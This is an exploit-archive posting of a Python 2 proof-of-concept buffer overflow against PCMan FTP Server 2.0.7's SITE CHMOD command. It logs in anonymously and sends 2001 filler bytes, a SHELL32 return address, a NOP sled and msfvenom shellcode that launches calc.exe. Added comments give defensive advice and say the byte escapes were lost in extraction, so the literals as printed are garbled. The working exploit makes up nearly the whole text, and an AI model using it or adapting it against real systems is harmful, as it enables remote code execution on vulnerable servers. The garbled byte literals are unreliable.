PCMan FTP Server 2.0.7 SITE CHMOD Buffer Overflow
Posted on 05 November 2016
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: PCMan FTP Server 2.0 BoF SITE CHMOD Command
# Date: 04/11/2016
# Exploit Author: Luis Noriega
# Tested on: Windows XP Profesional V. 5.1 Service Pack 3
# CVE : n/a
#
# NOTE(review): this listing reached the corpus flattened onto a single line,
# and the backslashes of its byte-escape sequences did not survive extraction.
# It is reproduced here as an artifact of the original advisory, not restored:
# treat it as documentation of the malformed SITE CHMOD request that this
# server version mishandles, not as a runnable program. The literals as
# rendered are therefore not the bytes that appeared on the wire, so do not
# derive detection signatures from their exact content. Python 2 syntax
# throughout (print statement, str-based sockets).
import socket
# shellcode with metasploit:
# msfvenom -p windows/exec CMD=calc.exe -b'x00x0Ax0D' -f c
# Overwrite value for the saved return address; the author's note attributes it
# to SHELL32.dll on the tested Windows XP SP3 image.
ret = "xD7x30x6Bx7E" #SHELL32.dll
# Payload emitted by the msfvenom invocation above. Per that command line it
# only launches calc.exe, i.e. a proof-of-concept marker, not a remote shell.
shellcode = ("xdbxd6xbfx70x7bxf3x98xd9x74x24xf4x5ax29xc9xb1"
"x31x31x7ax18x03x7ax18x83xc2x74x99x06x64x9cxdf"
"xe9x95x5cx80x60x70x6dx80x17xf0xddx30x53x54xd1"
"xbbx31x4dx62xc9x9dx62xc3x64xf8x4dxd4xd5x38xcf"
"x56x24x6dx2fx67xe7x60x2exa0x1ax88x62x79x50x3f"
"x93x0ex2cxfcx18x5cxa0x84xfdx14xc3xa5x53x2fx9a"
"x65x55xfcx96x2fx4dxe1x93xe6xe6xd1x68xf9x2ex28"
"x90x56x0fx85x63xa6x57x21x9cxddxa1x52x21xe6x75"
"x29xfdx63x6ex89x76xd3x4ax28x5ax82x19x26x17xc0"
"x46x2axa6x05xfdx56x23xa8xd2xdfx77x8fxf6x84x2c"
"xaexafx60x82xcfxb0xcbx7bx6axbaxe1x68x07xe1x6f"
"x6ex95x9fxddx70xa5x9fx71x19x94x14x1ex5ex29xff"
"x5bx90x63xa2xcdx39x2ax36x4cx24xcdxecx92x51x4e"
"x05x6axa6x4ex6cx6fxe2xc8x9cx1dx7bxbdxa2xb2x7c"
"x94xc0x55xefx74x29xf0x97x1fx35")
# 30-unit lead-in ahead of the payload.
buffer = 'x90'*30 + shellcode
# Argument layout as written: 2001 units of filler, then the 4-unit return
# address, then the lead-in + payload, then padding so that the part after
# `ret` is always 749 units long (2001 + 4 + 749 total). Defensive takeaway:
# a SITE CHMOD argument in the kilobyte range is far outside any legitimate
# mode/path and is a cheap thing to alert on or block at an FTP-aware proxy
# or IDS, independent of the exact bytes used.
buffer2 = 'x41' * 2001 + ret + buffer + 'x43'*(749-len(buffer))
print "Sending Buffer"
# Plain TCP control connection; note the stray space in `socket. SOCK_STREAM`
# (still valid attribute access, kept as in the advisory).
s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
# Hard-coded lab target (RFC 1918 address) on the standard FTP control port.
# socket.connect returns None, so `connect` is never meaningfully used.
connect = s.connect(('192.168.1.150', 21))
# Each recv only drains the server banner/response; the replies are not
# checked, so the script proceeds regardless of the login outcome.
s.recv(1024)
# The listing authenticates as the anonymous account before issuing the
# SITE command. Whether the same path is reachable only after login, or
# by other accounts, is not shown here — but restricting anonymous access
# and who can reach port 21 at all is the obvious exposure-limiting control
# for a server that cannot be upgraded or replaced.
s.send('USER anonymous ')
s.recv(1024)
s.send('PASS anonymous ')
s.recv(1024)
# The oversized argument is sent as a single SITE CHMOD command (no separator
# between the verb and the argument as rendered here).
s.send('SITE CHMOD' + buffer2 + ' ')
s.close()